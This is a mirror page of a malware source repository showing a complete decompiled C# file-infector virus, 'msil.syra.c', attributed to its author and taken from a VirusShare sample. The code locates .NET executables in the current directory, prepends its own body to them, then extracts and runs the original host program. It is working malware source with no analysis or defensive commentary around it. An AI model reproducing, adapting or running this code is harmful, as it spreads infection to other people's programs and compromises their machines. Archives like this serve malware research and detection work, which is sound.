mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
f2ac1ece55
add
163 lines
5.1 KiB
C#
163 lines
5.1 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: msil_syra_c
|
|
// Assembly: syrac, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 59A30167-FC92-46E3-93AD-211B753EB8EF
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa.exe
|
|
|
|
using System;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Runtime.InteropServices;
|
|
using System.Security.Cryptography;
|
|
using System.Text;
|
|
|
|
internal class msil_syra_c
|
|
{
|
|
public static void Main(string[] args)
|
|
{
|
|
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
|
|
foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
|
|
{
|
|
try
|
|
{
|
|
AssemblyName.GetAssemblyName(file);
|
|
if (!(msil_syra_c.Sha1(module.FullyQualifiedName) == msil_syra_c.Sha1(file)))
|
|
{
|
|
try
|
|
{
|
|
msil_syra_c.Infect(file);
|
|
break;
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
FileStream input = new FileStream(module.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
|
|
BinaryReader binaryReader = new BinaryReader((Stream) input);
|
|
int length = (int) input.Length - 5632;
|
|
binaryReader.BaseStream.Seek(5632L, SeekOrigin.Begin);
|
|
byte[] buffer = new byte[(int) checked ((uint) length)];
|
|
int count = length;
|
|
int index = 0;
|
|
int num1;
|
|
for (; count > 0; count -= num1)
|
|
{
|
|
num1 = binaryReader.Read(buffer, index, count);
|
|
if (num1 != 0)
|
|
index += num1;
|
|
else
|
|
break;
|
|
}
|
|
binaryReader.Close();
|
|
int num2 = new Random().Next(2000);
|
|
BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream("p" + (object) num2 + "h.exe", FileMode.OpenOrCreate, FileAccess.Write));
|
|
binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|
binaryWriter.Write(buffer);
|
|
binaryWriter.Close();
|
|
string currentDirectory = Directory.GetCurrentDirectory();
|
|
msil_syra_c.w32api.ShellExecute(0, (string) null, "p" + (object) num2 + "h.exe", (string) null, currentDirectory, 1);
|
|
do
|
|
{
|
|
try
|
|
{
|
|
File.Delete("p" + (object) num2 + "h.exe");
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
while (File.Exists("p" + (object) num2 + "h.exe"));
|
|
if (new Random().Next(4) != 3)
|
|
return;
|
|
msil_syra_c.w32api.MessageBox(0, "::::only SHA1gging .NET files::::", "msil.syra.c by alcopaul", 0U);
|
|
}
|
|
|
|
public static void Infect(string host)
|
|
{
|
|
BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read));
|
|
binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|
byte[] buffer1 = new byte[5632];
|
|
int count = 5632;
|
|
int index1 = 0;
|
|
int num1;
|
|
for (; count > 0; count -= num1)
|
|
{
|
|
num1 = binaryReader1.Read(buffer1, index1, count);
|
|
if (num1 != 0)
|
|
index1 += num1;
|
|
else
|
|
break;
|
|
}
|
|
binaryReader1.Close();
|
|
FileStream input = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
|
|
BinaryReader binaryReader2 = new BinaryReader((Stream) input);
|
|
binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|
byte[] buffer2 = new byte[(int) checked ((uint) input.Length)];
|
|
int length = (int) input.Length;
|
|
int index2 = 0;
|
|
int num2;
|
|
for (; length > 0; length -= num2)
|
|
{
|
|
num2 = binaryReader2.Read(buffer2, index2, length);
|
|
if (num2 != 0)
|
|
index2 += num2;
|
|
else
|
|
break;
|
|
}
|
|
binaryReader2.Close();
|
|
BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write));
|
|
binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|
binaryWriter.Write(buffer1);
|
|
binaryWriter.Write(buffer2);
|
|
binaryWriter.Close();
|
|
}
|
|
|
|
public static string Sha1(string data)
|
|
{
|
|
BinaryReader binaryReader = new BinaryReader((Stream) new FileStream(data, FileMode.OpenOrCreate, FileAccess.Read));
|
|
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
|
|
byte[] buffer = new byte[2048];
|
|
int count = 2048;
|
|
int index = 0;
|
|
int num;
|
|
for (; count > 0; count -= num)
|
|
{
|
|
num = binaryReader.Read(buffer, index, count);
|
|
if (num != 0)
|
|
index += num;
|
|
else
|
|
break;
|
|
}
|
|
binaryReader.Close();
|
|
return msil_syra_c.BytesToHexString(new SHA1CryptoServiceProvider().ComputeHash(buffer));
|
|
}
|
|
|
|
private static string BytesToHexString(byte[] bytes)
|
|
{
|
|
StringBuilder stringBuilder = new StringBuilder(64);
|
|
for (int index = 0; index < bytes.Length; ++index)
|
|
stringBuilder.Append(string.Format("{0:X2}", (object) bytes[index]));
|
|
return stringBuilder.ToString();
|
|
}
|
|
|
|
public class w32api
|
|
{
|
|
[DllImport("shell32.dll", CharSet = CharSet.Auto)]
|
|
public static extern int ShellExecute(
|
|
int hWnd,
|
|
string oper,
|
|
string file,
|
|
string param,
|
|
string dir,
|
|
int type);
|
|
|
|
[DllImport("user32.dll", CharSet = CharSet.Auto)]
|
|
public static extern int MessageBox(int hWnd, string text, string caption, uint type);
|
|
}
|
|
}
|